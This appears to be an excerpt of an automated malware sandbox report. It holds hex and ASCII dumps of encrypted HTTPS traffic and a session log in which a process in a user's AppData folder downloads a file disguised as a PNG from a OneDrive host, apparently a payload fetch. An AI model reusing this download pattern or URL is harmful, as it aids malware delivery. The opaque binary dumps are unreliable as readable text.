                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1737INData Raw: 6c 14 b1 73 8f 16 5b fb cd 08 09 72 e7 ea ab 2f 8b 7e 14 bf 1a 72 9f 5f df a9 bb 76 fd b2 82 57 e1 a3 1f 98 5a 97 bb 7e 4f 82 2f 69 6a 5d 9f ba b3 11 f4 27 1c 9f df 2c c7 f5 2d 26 56 72 c0 3c e4 94 65 3e 3d 87 4f fb b1 f7 b0 e4 15 cf 3e ee fb 60 ca a2 e3 5c 91 07 a5 93 ba 84 8c 0e c7 00 39 9d a9 9b db 5a 58 e1 4c 87 c2 30 49 29 36 1f dd 37 50 51 dc 52 fa cc c7 2b d0 5a 6f fd a9 bd b5 36 b1 b5 9f 64 d2 b3 ae 79 fa f2 b1 3b 25 25 26 43 24 35 df ef 4b ed dc d1 9b 84 67 f5 8b fb 52 f6 01 a4 af d1 fe fe 1a 1b a1 78 b5 56 79 e2 b0 5e 42 c8 b0 c9 00 05 c3 b8 62 63 f6 cc b0 76 24 8a de f8 c7 52 9f ce ae df 14 7b a2 15 80 0a b1 d9 81 82 a1 0c bd 94 fd 21 99 25 95 ad 5a 1a f4 a8 ad 5c 28 be bd 29 d6 d8 2e 4d 28 b4 92 37 f1 80 ac c1 9c e5 64 0b 70 5c 36 03 65 ce 7a
                                                                                                                                                                                                                                                                Data Ascii: ls[r/~r_vWZ~O/ij]',-&Vr<e>=O>`\9ZXL0I)67PQR+Zo6dy;%%&C$5KgRxVy^Bbcv$R{!%Z\().M(7dp\6ez
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1753INData Raw: fa 90 fa d6 eb 92 1a 44 cd 33 43 0f df 6c e1 4e 88 74 0b a2 b5 d1 97 7a a3 76 78 55 41 9f ab 14 2e fc a3 23 6c 98 3f 7c 0d 34 0c a1 9b a5 59 a4 74 e4 37 66 57 54 f5 77 3b 29 a0 62 da a1 3d e3 50 0b a7 ac fe e6 39 f7 bb 1a d8 26 5c 48 3a 65 13 f5 7f 5a fe 39 78 c2 91 5c 1d d5 e2 0a c7 bb b4 9a 27 75 2b b5 3a 19 e1 cd 05 cf 37 b1 47 e4 4f 6c 90 ee 1c bb 23 30 51 91 f7 e5 f9 11 64 bc 0f 72 b3 b9 8a 1b 80 e8 dc d8 fc 7f 45 40 bf f8 b6 f2 8c 48 db cd ce 80 80 b9 f0 b7 41 a3 49 3b 4a 01 9d 0b 52 a7 ce 9a 89 01 9b 35 d0 26 ba 5e 17 91 64 16 19 21 cb 20 ae c7 ac fc 21 16 22 b0 88 f1 b1 60 38 71 03 5b 4d bb 5e ca 37 85 5b 99 b5 8e 00 21 e4 9a e2 6a 7c 4e eb 59 06 39 bc 3a 86 eb 93 59 c5 c2 fd c6 ce 72 fc 9d 97 9b ac 46 37 9d 35 3d 1c bc c2 fc 58 5f 58 af 09 a8 a7
                                                                                                                                                                                                                                                                Data Ascii: D3ClNtzvxUA.#l?|4Yt7fWTw;)b=P9&\H:eZ9x\'u+:7GOl#0QdrE@HAI;JR5&^d! !"`8q[M^7[!j|NY9:YrF75=X_X
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1769INData Raw: 41 32 27 26 9e f3 c8 58 81 4b 2c f3 a4 13 da c3 e3 7e 4e d9 aa 46 bd 58 3c d6 a7 64 1a 7a c8 89 bd c3 72 f9 d6 8f da 1a 2d f7 ed 34 0f fe 25 15 2b 4e 34 5c 9a df 3b e4 64 be 6b 3d 6f 5f 45 4b 11 b7 0d 6d e5 d7 97 9c 22 b7 c5 fe 6b d7 a9 56 26 12 90 f7 29 f0 6d 1f b0 6a 16 87 a5 17 28 05 ff 5d 45 71 6e 53 84 8c b5 b2 9d 97 f9 7d 7f 51 0e 54 10 b6 2b 46 76 7f 60 43 5c 6c 04 b9 87 b3 d7 ac 25 ec de 95 26 f0 13 4f 8d 95 4c d2 4e 58 89 5c aa 4c 99 10 c3 fb 3f 12 00 ba 49 96 dd 71 08 8d c4 f0 03 eb 96 94 6d 9b e3 7e 00 bd fd 5f ee d0 27 3a 8a 77 55 c7 3d 57 03 d3 07 6f 0c 64 53 84 0f 96 48 64 f4 77 94 fb 26 a1 52 cb 63 0d dd 52 36 fe 51 fa 15 ef f6 d3 22 b8 55 e0 2b 0b e2 54 2a b2 99 0c 0e ee aa 99 c7 03 67 f8 ff d5 c3 81 4c 1f 2d 09 c5 73 bf 33 8c c8 d3 d5 d7
                                                                                                                                                                                                                                                                Data Ascii: A2'&XK,~NFX<dzr-4%+N4\;dk=o_EKm"kV&)mj(]EqnS}QT+Fv`C\l%&OLNX\L?Iqm~_':wU=WodSHdw&RcR6Q"U+T*gL-s3
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1785INData Raw: 6e 52 43 34 4b 03 eb f2 6c 2d df 8e fc 51 8d df ea 73 52 b3 24 aa ec b8 71 8f d3 5d 53 e3 ff d0 fb d8 80 64 05 8c 74 3f 25 4a f3 92 ff d5 79 21 31 70 a0 62 15 eb 70 06 cc 69 2d 28 b1 9f 94 9b e8 fb 24 5c 76 4b ca 5b 7b c6 f8 de 1c 61 e0 8b a6 87 16 71 da 2d d0 9b 98 b4 0c 90 74 ab 94 34 8c c7 5c 91 27 a7 6f a6 8a aa 05 9d 1c 99 12 72 6f 92 fe 98 7c 9e 5e 96 21 0d 0b 99 f2 54 06 93 f9 6b 29 d9 88 aa ba 8e 24 26 1f 80 f9 9b d3 95 1f 1f 8b 5b 9f 0f 02 13 14 3f 8c b2 fd 2f c9 db cc 7b 95 6f 98 6f 9d bd 41 c5 56 c9 c0 2a 4f ab 9d 8c 79 84 91 09 99 5b 3c ba af 90 36 53 f9 54 29 a5 83 2e 6d 94 6c 89 b7 cb 69 5f fc aa e4 de c1 25 7f 17 97 1f 0f e6 16 b3 9a 4f 91 b1 a6 31 50 e5 28 8f b9 ac 45 e5 87 1c 8b b1 e9 ad fc d4 c0 92 81 a7 a3 ed 1e 10 35 9b fe 54 17 25 9c
                                                                                                                                                                                                                                                                Data Ascii: nRC4Kl-QsR$q]Sdt?%Jy!1pbpi-($\vK[{aq-t4\'oro|^!Tk)$&[?/{ooAV*Oy[<6ST).mli_%O1P(E5T%
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1801INData Raw: 94 85 54 0c f8 58 8e d5 69 a6 9c 9d 40 f9 7c 1d 6b 9d 0c c4 12 41 a3 04 ca 21 10 e1 59 01 f7 3b ed cd 56 ad cc c8 d3 18 d2 a8 5e 17 33 55 83 41 f2 f5 18 66 e4 06 04 e4 a7 a1 b1 53 4f 2a 28 c5 cc 79 00 61 14 1f 36 75 2f f3 c2 23 23 e8 47 b6 0f 85 02 e7 7f 5f 9d 6d d4 89 34 26 dc f6 59 49 0e 48 38 92 ed 22 e9 46 15 c4 1f 68 fd e4 39 d0 d7 49 4d 1d ef 28 14 17 7d fd eb 76 0c cd a4 65 e4 01 95 0e d2 bc c3 69 e8 51 00 68 53 d7 c7 4e 9f 6d 41 e1 76 54 3c 89 35 cf 48 fd 5b 91 9e 68 43 fa 1c 49 f6 87 f4 08 bf 63 b1 ab 37 8b cc 73 b4 66 07 e7 7d 27 9f 75 11 a2 f0 70 fc 86 cd 60 b1 2a d7 5c cb b5 d2 5e ca d9 e3 2b b9 39 96 41 38 9c 00 77 13 89 f1 2a 90 b8 fc f4 aa b4 93 e1 b6 80 5d 95 ea d6 18 b5 bf 8a 22 83 94 fc 05 88 52 37 ea bb 28 da d6 90 8f 44 52 9b a6 bd 94
                                                                                                                                                                                                                                                                Data Ascii: TXi@|kA!Y;V^3UAfSO*(ya6u/##G_m4&YIH8"Fh9IM(}veiQhSNmAvT<5H[hCIc7sf}'up`*\^+9A8w*]"R7(DR
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1817INData Raw: a6 57 23 cf b4 54 45 f1 1c 02 6f 0c d6 ac 21 02 b8 14 e0 71 d8 ef 96 52 e4 8f 66 29 51 48 55 a1 07 11 62 81 9e af 5b 7e 3f be 9e ba 60 14 05 c0 78 80 46 dc d3 05 f7 75 5b f6 2c 44 85 c2 4f 48 54 50 4f 15 96 33 77 e9 6b 54 64 f4 91 b2 29 f9 33 8b 86 79 10 40 29 d7 57 39 4d de 65 e9 e1 46 d5 6d 45 87 06 2e ea 55 2f 71 99 ee d8 5d f7 77 95 d3 8b 41 b7 cc e9 6a 28 a2 17 47 1d 5d 0f 1f b4 d3 d5 8c ec 7a 5c 0d be b4 b2 ab 85 8a 2b 57 93 21 17 12 8b a2 45 33 95 75 8e b8 d5 45 53 58 f4 e7 a2 e0 27 43 dd 50 4e b6 c7 a8 c9 a2 d2 16 dc da 92 0d ad 1d 83 c6 0f a3 17 77 d4 c3 37 dd 2d 97 c1 c1 c4 71 39 4d c8 e2 a0 78 fc ae 86 dd 86 63 61 a1 14 aa 4f c9 d9 d2 73 20 51 12 99 7d 66 43 13 74 e2 03 77 ee b1 c8 30 c0 9b 6f 09 e2 78 e9 50 3f 98 1c 9c 20 f6 c1 46 de ff 8f 05
                                                                                                                                                                                                                                                                Data Ascii: W#TEo!qRf)QHUb[~?`xFu[,DOHTPO3wkTd)3y@)W9MeFmE.U/q]wAj(G]z\+W!E3uESX'CPNw7-q9MxcaOs Q}fCtw0oxP? F
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1833INData Raw: 57 fd c0 c7 eb a8 55 eb 49 f9 9e 9a b6 28 94 1a b0 9f 82 ba 38 43 c9 df 51 fd cf c3 26 21 a3 99 5b fe 45 54 95 3b 09 a2 e4 87 2b db eb 8e c3 72 9c 69 4f 62 43 66 65 3f 1d d9 6a 08 9d 30 b2 f1 a4 5f 7f a7 69 4e f7 00 a3 b6 b3 bd d7 eb e9 3f d9 7b 2f 66 5a 92 7c a5 d5 8d c8 7f 1b 6f 54 62 dd 6e a1 97 9f 57 a3 b2 37 37 fc 6d ff d3 ce 8d 0d 2f 63 e7 03 1e 34 eb d2 a7 67 59 fb d0 e7 41 dd b4 f1 f0 29 b6 e3 f9 79 be 36 ba 98 47 80 bb 7f b3 6c ca bd 92 1d a2 b8 33 aa 4d d5 1f 9e 38 f5 8d 7e ec cb 0a c4 40 a8 90 18 b3 24 ca 3f 05 95 10 34 41 00 67 86 90 66 db 36 87 0b 21 4b 87 2d ad ee 06 8d 27 32 07 7b 43 df 2e ed 99 df 73 f6 f3 86 83 1a 48 db cc ae d0 4d 70 fe 6c 54 ee 31 8a 9c 03 9e 33 9b 55 dc 63 ad f6 83 71 47 4a 71 06 c7 b6 b2 ea ef d2 51 f9 1a 66 e0 98 59
                                                                                                                                                                                                                                                                Data Ascii: WUI(8CQ&![ET;+riObCfe?j0_iN?{/fZ|oTbnW77m/c4gYA)y6Gl3M8~@$?4Agf6!K-'2{C.sHMplT13UcqGJqQfY
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1849INData Raw: 72 ee 09 10 a7 52 ec 27 f3 99 0f 15 39 d7 f1 8e b6 b5 15 9b f6 1d 52 1f 6c 34 4b 7a 2b 5e 5c 3b 17 84 38 06 32 64 aa f9 16 21 ea 65 64 89 7f 0c 53 f8 f6 57 35 7a be ef c6 27 2e 59 c2 52 5f 3d 80 11 0e cf 9e 26 21 6c 81 cd 71 0a f7 75 19 6d 21 82 e6 c7 79 a1 23 88 31 f9 48 3f 5d 97 49 49 28 bf 7c c5 8b 2c 80 a2 74 ba 81 47 de 9f 01 57 4d c9 4a 5a 67 aa f2 5c 2c c8 63 d2 8e 1c 48 1e f1 f2 3b 7e fd 6c d6 fa 6f 3c 43 1d 3a 8d 3e c7 d9 b0 83 8c 94 e2 8f 27 9d ed 58 d9 bc 1d 13 2c 2c 04 50 7e 5f 08 8e fc e3 8e ba 90 b2 24 68 84 77 4c 7b 95 db d7 46 30 84 0e c3 6f 6f bf cc 5d a9 ef 47 52 9e 66 74 41 6e 88 75 99 e0 76 0e 28 24 6b c9 6f 23 f3 e9 ae 52 f5 de 28 3b a4 b0 cf 64 47 7a c8 ce d2 93 9e d6 f7 b6 d1 6e 3c b1 d7 15 02 f7 53 9e d9 22 9f 60 79 e4 72 47 18 00
                                                                                                                                                                                                                                                                Data Ascii: rR'9Rl4Kz+^\;82d!edSW5z'.YR_=&!lqum!y#1H?]II(|,tGWMJZg\,cH;~lo<C:>'X,,P~_$hwL{F0oo]GRftAnuv($ko#R(;dGzn<S"`yrG
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1865INData Raw: e2 19 74 8f 53 3c f9 9f 2d 46 6f d9 a6 07 3f 7f bf 26 19 3b ff f3 fa 8d fb ac 7b e3 b6 43 81 c6 dd ff ee 2b 50 54 a3 e0 16 3a b6 57 01 ae fe 54 63 7c af 63 b3 53 89 4e 89 1e a0 68 39 2b 52 1c bc 1e 57 76 ed 46 68 a6 1e 81 98 73 bf 4b a2 86 5b 53 b6 6b 29 54 f1 2a 59 05 e0 cc a7 50 fb e7 c2 a4 e9 dc 88 03 36 bf b9 a7 5c 63 10 67 3b e5 5d 77 27 d6 86 0f ba 69 c5 f3 39 21 52 67 81 ea 14 11 f7 60 00 0c 78 dc 04 d6 46 59 73 2c 70 e5 b7 60 17 d0 88 5f 44 75 80 a1 02 f0 3c 7e 45 df 79 0b 14 a7 4d ef 2a 08 c3 ba d2 b0 50 92 9e 9e df 5d 3d 6d 4f 25 31 a4 bf ed bc 68 2f 66 68 8e 04 be b6 85 33 4d b1 f6 2f d4 45 21 48 1d 08 ec 2f 1f 70 a6 19 70 98 e3 ff 01 ea 8c fd 8b d8 fc 72 76 05 24 b5 34 33 06 70 98 42 6d f7 c1 c8 ed 99 ce e5 d8 32 d7 50 b9 7d 5d 58 4c b0 2d 6b
                                                                                                                                                                                                                                                                Data Ascii: tS<-Fo?&;{C+PT:WTc|cSNh9+RWvFhsK[Sk)T*YP6\cg;]w'i9!Rg`xFYs,p`_Du<~EyM*P]=mO%1h/fh3M/E!H/pprv$43pBm2P}]XL-k
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1881INData Raw: dd c1 13 c1 d5 39 a0 aa 19 30 30 5c c9 18 dc 2e 23 fc 55 93 08 fe 23 98 bb c1 79 29 f7 da cc c2 07 14 2c ad 07 39 08 b5 b9 12 94 51 26 a1 b3 ca 31 28 aa 65 ad d1 c4 c6 d8 ba 1a 0d 99 a9 be a1 50 3d 2a a0 1a 32 1d cc c7 db 70 92 27 f1 d9 be eb b4 9c cc 75 bc 6f ec 4f 95 04 a1 97 40 ac 1d 11 08 ca e3 79 e6 22 fe d9 2f c0 ac 37 05 e5 73 05 90 aa 00 8f 6e 8b a2 48 0a f7 90 c2 59 5c a7 2a d0 b8 ef 31 cb 68 15 13 fe 1b 49 8e d0 37 37 8d 64 ab db 9a 0d 08 89 93 2e 68 57 f2 c6 68 8e 5e 90 9e a8 3f 5e 56 2d 9b c1 9e 3f af 4e 13 39 82 1b 1f 03 8a 0e 7f 88 e9 43 a4 55 0d 8d 1f 99 5b f4 e8 6f 8c 83 6e bf 08 c5 1b b7 08 16 51 7a eb e7 7b fb f2 f5 b1 da d9 0a 65 ea 25 43 6a 19 d0 01 63 a9 2c 91 87 ca 5e ac f5 76 ed 82 de 41 65 74 f5 1d 2e 21 a1 09 dc 92 d4 18 09 52 0b
                                                                                                                                                                                                                                                                Data Ascii: 900\.#U#y),9Q&1(eP=*2p'uoO@y"/7snHY\*1hI77d.hWh^?^V-?N9CU[onQz{e%Cjc,^vAet.!R
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1897INData Raw: d7 d2 31 8e 8e 8e 13 c1 f5 48 36 eb 96 7f b4 8c 28 33 8f ce 89 c0 40 b2 e3 22 09 10 b8 78 0f fd 73 76 0f 1a 88 88 77 0d 47 07 4c 1b fb 83 12 bb 8e 6f a9 7a 05 41 21 54 16 df d7 f0 b5 f8 1a bc 96 8b 11 67 bd 17 19 64 de 5e 97 32 b0 65 a7 d6 14 d4 62 42 e7 fc e8 ee fe ff fe fc e3 3b 3b d8 2e 54 89 fd 07 ae bf 9c 8a 3a 04 16 2c c5 86 da 0a 4f 56 71 f9 f2 06 0c 74 d2 70 b5 49 27 ae e7 8c a8 5e cf ec 9c c1 2f ff 07 af 27 e0 00 88 6b 55 6d b1 34 fa 5b 60 4b 14 98 28 f5 8d bd 36 d1 52 88 9c 5d d1 29 80 3d 4d 9c d9 a7 9a c9 a0 31 8f 03 65 da 3d 65 a1 a7 76 9a 99 1d ea 83 b6 99 61 ac 1b 51 b2 92 c5 01 9d 79 89 c6 db fd 24 9a fd 1c dc f4 72 9a 02 0f 30 aa af 7e 3c 6e dd 3d b2 3d 9c 38 bc 79 23 40 1f d1 74 07 a8 63 4f 95 cc 8f 07 f7 ec 8c 32 de 7c 85 9b 4e 5d 9e 8c
                                                                                                                                                                                                                                                                Data Ascii: 1H6(3@"xsvwGLozA!Tgd^2ebB;;.T:,OVqtpI'^/'kUm4[`K(6R])=M1e=evaQy$r0~<n==8y#@tcO2|N]
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1913INData Raw: 20 93 bf 9f 52 7b f9 c2 2f 3e a7 d5 76 f2 47 6a 21 90 c1 13 a0 92 d4 4c 7b 42 9e b3 08 c0 75 52 11 7f f0 3e 97 c1 79 62 1c 66 4c 3c 03 18 88 76 86 c1 85 41 bb 79 7d 8e 5b 60 74 34 f8 7d 16 bf ec 20 0c 57 95 8a 7d fd 88 85 60 0c ac 55 cb 3e 4d 06 2b 55 11 ae 9a c9 b8 b1 ff 06 c9 2a 5a b9 16 71 6a de e5 35 fc f1 86 0b be 62 5d 82 7e 08 60 af c6 9b c9 71 36 ff 65 42 2d 6b 39 34 53 c3 d7 13 d5 2e f6 ff 4b b4 61 25 6b 2d c8 f9 19 42 eb 00 c3 1e dd 22 8d 9b f3 97 75 7e 71 1b a6 33 a7 21 38 7a 35 77 be ac 9a d9 20 61 c8 79 0e 3f 91 04 44 30 60 63 77 39 ce e5 0e ce 14 1f 18 34 80 af b4 d2 54 82 93 21 e8 5a 8e a6 7f d9 31 1b c4 e8 d7 cd 6e 3c c8 6a 52 a7 11 eb 8b d1 9a 8c 65 27 d2 71 49 1a 77 37 f7 4f ef c8 a6 26 8a 73 4f 4c 5d 5f 6d 65 ea 6e 99 06 5c 89 2a cc d1
                                                                                                                                                                                                                                                                Data Ascii: R{/>vGj!L{BuR>ybfL<vAy}[`t4} W}`U>M+U*Zqj5b]~`q6eB-k94S.Ka%k-B"u~q3!8z5w ay?D0`cw94T!Z1n<jRe'qIw7O&sOL]_men\*
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1929INData Raw: dc 6f 95 1a 62 28 0d 7f ad 11 68 dd 01 4f 10 84 76 f0 eb 97 53 26 59 76 1f d8 50 99 07 39 5a 8c 1f 0c 36 3c e9 a6 98 b5 aa 2d 4a c8 80 1d 4f c9 3f 98 c0 ad 41 cc 9c 24 e5 44 63 83 5c ed 65 d1 d5 a0 09 b0 e5 a5 64 ba bc 42 2b b5 ec 3d 89 73 02 c6 3e 73 8f 12 a6 ee 2b a7 51 86 92 ae ca 5b 39 3a 69 5c 79 ad a3 40 b9 4e a7 86 73 83 64 17 99 4c 1a 2f ab 5b 9f a4 4f bd 57 ca 42 7c 10 19 23 0b de b1 73 c1 31 e3 63 54 af 20 e2 d7 f3 3d 98 e1 e5 96 9d c1 0d a5 eb 09 af 98 35 fb 31 d7 48 e9 b5 1f e1 72 7e 26 ae 52 b0 39 84 7b 6a db a8 ca 31 78 d9 aa 93 ae 1f a5 ef 78 90 1f cf f5 50 c5 ad 6d 19 03 2e 23 47 50 bf 02 23 31 11 19 da f7 ce 28 84 5e 21 56 06 9d 49 79 48 bf a7 66 44 b1 c0 13 a7 db 2b 73 15 a8 73 09 a6 13 cf 0f f2 49 64 b2 41 33 c5 76 a5 ff fd f2 8b a5 81
                                                                                                                                                                                                                                                                Data Ascii: ob(hOvS&YvP9Z6<-JO?A$Dc\edB+=s>s+Q[9:i\y@NsdL/[OWB|#s1cT =51Hr~&R9{j1xxPm.#GP#1(^!VIyHfD+ssIdA3v
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1945INData Raw: 6b 0c 59 9e ee 72 f9 bf f0 f9 64 f7 d8 c4 1c fd a8 30 02 e7 66 2a c9 bc 2a 42 65 5f 2e 95 ac b6 21 d5 c4 31 96 c3 a2 98 3a 47 c4 91 12 29 52 3c d9 da 1c 0c 8a 85 e0 e3 4b c4 37 ef ef 51 32 cd 1e c0 68 73 40 32 22 a9 c8 f7 62 7e b7 78 fa b2 df 19 f2 69 8c 36 99 a2 6c 03 a9 7a 7a 4a 0e dd 1c 16 d0 85 28 f6 b3 19 ac 5f 99 5f d4 1f d7 52 8f 30 aa 96 0b df ff 56 1c 5e ec 61 22 d7 fa 04 a6 50 d0 c2 78 dd 40 49 20 e5 3c 07 72 26 d0 80 d5 03 05 90 36 4f be 5d 27 9c 18 1c 74 be 82 42 50 ac 05 2c 6a f3 16 e2 93 b2 20 0b 86 63 c4 64 ca e6 98 f9 e9 db 9c fe 85 b8 dd 02 79 69 c6 71 a6 5d dd c5 0f 81 0b 52 ac 59 b6 ef 70 10 b4 e8 35 3c 24 9b 08 2b 15 ec c6 6e 87 4d e9 80 ea fe 5f 8f 14 b9 50 3a 3a 23 4d e9 c1 40 b5 16 9d dd 31 f4 23 eb 33 2f bc ce 4c 67 c9 a8 31 73 ac
                                                                                                                                                                                                                                                                Data Ascii: kYrd0f**Be_.!1:G)R<K7Q2hs@2"b~xi6lzzJ(__R0V^a"Px@I <r&6O]'tBP,j cdyiq]RYp5<$+nM_P::#M@1#3/Lg1s
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1961INData Raw: fd a0 fb 20 78 10 95 7a 1b 6c 8f b4 45 3f a2 2b a2 6d 7d a7 62 a8 a3 02 2c da f5 02 9e 03 cf a1 8a 68 3c 6d df 22 5a e0 c3 8d 52 72 a8 4f 85 aa 70 1e f3 20 56 d4 21 3e d9 35 3b c6 37 87 c4 fa 43 ef 61 21 5f 00 49 db 5b 0e cf e7 bb da b4 0f 96 4d bd 86 63 f1 70 32 54 35 ee 1c 1c fe a1 fb a0 8f 92 6b f6 63 e3 f7 53 2f 71 83 66 5d d5 97 82 fe 69 ba aa fe 60 db 37 dc 2b 66 d3 c7 62 80 42 88 77 2e 00 be ed e3 26 08 d3 cf b1 aa 26 02 1e ff 28 95 19 59 76 e5 2f d1 97 43 08 3b 23 3e 58 34 1f ac c2 c7 23 d7 ab c5 2b ce 37 83 15 85 f0 dd 15 37 d7 df 36 6a ee ff 62 35 41 f8 ae ed 30 c6 c4 b9 2c 2c a3 f8 27 a9 fd 22 c2 d2 fb 82 3b ea d1 1c 65 c5 4e 57 72 87 41 6e 14 8a 62 13 9b 47 4c 58 74 b8 90 24 40 fe 26 8d f3 0f 02 9b 46 22 78 e3 5c 2d 86 40 d6 14 2c 60 a1 e8 cd
                                                                                                                                                                                                                                                                Data Ascii: xzlE?+m}b,h<m"ZRrOp V!>5;7Ca!_I[Mcp2T5kcS/qf]i`7+fbBw.&&(Yv/C;#>X4#+776jb5A0,,'";eNWrAnbGLXt$@&F"x\-@,`
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1977INData Raw: f9 63 bf f7 fc 80 b9 4b 61 60 e5 82 7b c3 d5 0e 99 37 3a 43 90 a5 b2 20 03 09 b3 ca fd 36 86 00 26 84 d8 42 86 59 05 ba e6 75 0c 89 33 5b 7c 13 dc b3 6b 59 59 71 cc 1c 56 ad fb 5f 08 2d 1e 1f 03 4a b3 75 c6 11 60 b6 69 5c f4 f2 01 0c a0 ba ca 87 e6 10 b0 ce 13 ec f6 5e df 54 3d 3e 70 69 1e ba d9 3a b3 59 95 6a d0 11 e2 d6 bf a4 2b 75 8a dc bc f7 97 2a 74 54 bd b9 33 12 79 58 f3 36 ec f3 61 a7 29 5a 96 44 2a d2 84 c7 23 5e 72 7e ab 04 73 13 b4 18 f1 25 c6 e1 40 f4 a1 18 53 10 de a9 bc 32 a2 59 08 a4 11 06 a4 ef 71 bd ff 84 1b a1 f5 5f fc 42 d1 12 ec 12 d0 63 b0 9b bf c8 4d c5 e1 87 0c 98 d6 9f bb 7f fb 34 7e e2 09 94 0a 39 e9 4a 88 08 fa cb 15 cc cb f5 28 52 eb ae 44 7c d8 10 e8 84 15 34 5a d4 94 1c 52 f8 5f 9b 71 69 cc 02 4f 33 a4 1b b8 ea b8 ed 9a aa 86
                                                                                                                                                                                                                                                                Data Ascii: cKa`{7:C 6&BYu3[|kYYqV_-Ju`i\^T=>pi:Yj+u*tT3yX6a)ZD*#^r~s%@S2Yq_BcM4~9J(RD|4ZR_qiO3
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1993INData Raw: 83 9a 8a d8 d0 cd 8c 78 81 eb db 16 cd 68 7d ad 43 d0 05 ee ad 7f 36 0f f0 fe fb c8 a6 48 59 a2 f4 c6 c4 32 eb b7 1f 5f 55 e1 02 fe e4 d5 61 f4 be a0 13 cf 49 2f fa 9f 47 70 90 ce 17 22 d5 09 7e 45 43 f8 3e 3b b9 26 2b b8 41 c6 0e 56 2e 34 f9 ed 43 c0 11 2f 3f 6d 2f af bf 4a 21 01 87 43 6e 17 ed 14 94 fe 22 31 a8 f5 d0 c4 c2 8f ca c9 8f 21 ca b7 2c 40 d8 d2 0f 4f 80 56 bc 8b f2 96 d7 40 6b 8f b2 10 3c 48 52 a6 6f 9b a0 46 c9 75 69 97 34 49 21 e9 b3 8b 20 82 22 31 eb 88 f0 fd 13 2c a2 4b 30 20 fb 09 12 73 64 14 76 00 db 9b 96 dd 82 e2 23 19 fc c4 a0 0b 28 61 c5 37 f5 79 75 45 e8 c0 2c 6b de c9 38 0f ab d5 f8 7d 92 d1 3c 0a c3 1b 53 6f 5d 98 06 3b e3 80 37 c7 46 68 d9 d6 0a b2 e4 4b 76 9a a1 57 17 6f 03 ac 81 84 3e 73 6b 81 69 03 8b 7b f3 d5 0a 06 c7 e1 fe
                                                                                                                                                                                                                                                                Data Ascii: xh}C6HY2_UaI/Gp"~EC>;&+AV.4C/?m/J!Cn"1!,@OV@k<HRoFui4I! "1,K0 sdv#(a7yuE,k8}<So];7FhKvWo>ski{
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC2009INData Raw: 64 1d 62 0e 71 1d 67 3b 68 0b 71 22 76 17 72 02 6b 01 64 1a 62 62 71 78 67 5c 68 40 71 60 76 4a 72 5b 6b 40 64 44 62 62 71 4e 67 66 68 6f 71 19 76 0a 72 1f 6b 0b 64 06 62 0c 71 19 67 01 68 20 71 31 76 09 72 0e 6b 6e 64 35 62 0d 71 16 67 06 68 16 71 29 76 4a 72 0f 6b 02 64 18 62 62 71 78 67 4b 68 6f 71 51 76 28 72 0e 6b 09 64 15 62 0e 71 3b 67 02 68 1e 71 29 76 16 72 02 6b 09 64 1c 62 16 71 78 67 6d 68 6e 71 7a 76 65 72 6a 6b 22 64 11 62 05 71 19 67 01 68 3a 71 22 76 05 72 0f 6b 0b 64 19 62 03 71 0a 67 06 68 1d 71 50 76 64 72 6b 6b 6e 64 4a 62 69 71 79 67 22 68 1c 71 39 76 03 72 02 6b 00 64 15 62 0e 71 3e 67 04 68 02 71 35 76 0a 72 0a 6b 03 64 11 62 62 71 39 67 02 68 00 71 3b 76 1c 72 12 6b 40 64 10 62 0e 71 14 67 6d 68 6e 71 72 76 65 72 6a 6b 3e 64 06 62
                                                                                                                                                                                                                                                                Data Ascii: dbqg;hq"vrkdbbqxg\h@q`vJr[k@dDbbqNgfhoqvrkdbqgh q1vrknd5bqghq)vJrkdbbqxgKhoqQv(rkdbq;ghq)vrkdbqxgmhnqzverjk"dbqgh:q"vrkdbqghqPvdrkkndJbiqyg"hq9vrkdbq>ghq5vrkdbbq9ghq;vrk@dbqgmhnqrverjk>db


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                2192.168.2.34970613.107.43.12443C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe
                                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                2023-01-05 08:23:13 UTC2010OUTGET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1
                                                                                                                                                                                                                                                                Host: kpf0yw.am.files.1drv.com
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2010INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: public
                                                                                                                                                                                                                                                                Content-Length: 802816
                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                Content-Location: https://kpf0yw.am.files.1drv.com/y4mXsLf1SAgLndu0LyZNrmjtLiPfggndVuTWW_YNIbQYCJQ5VZrs6PCmpqh0CNlrLSJtcfBfk8rXI1F2zUj_boSCLZDYfJbM488hFz1Nfw1ZcIJDifMtcS_s4wYaLCDT7s0CzKFcMh6yKZTXWQC-bvilgxtalUvsuLasf3pVtYWyv5mEWT6ByUf-RzGuSatfzqU
                                                                                                                                                                                                                                                                Expires: Wed, 05 Apr 2023 08:23:14 GMT
                                                                                                                                                                                                                                                                Last-Modified: Wed, 04 Jan 2023 23:47:32 GMT
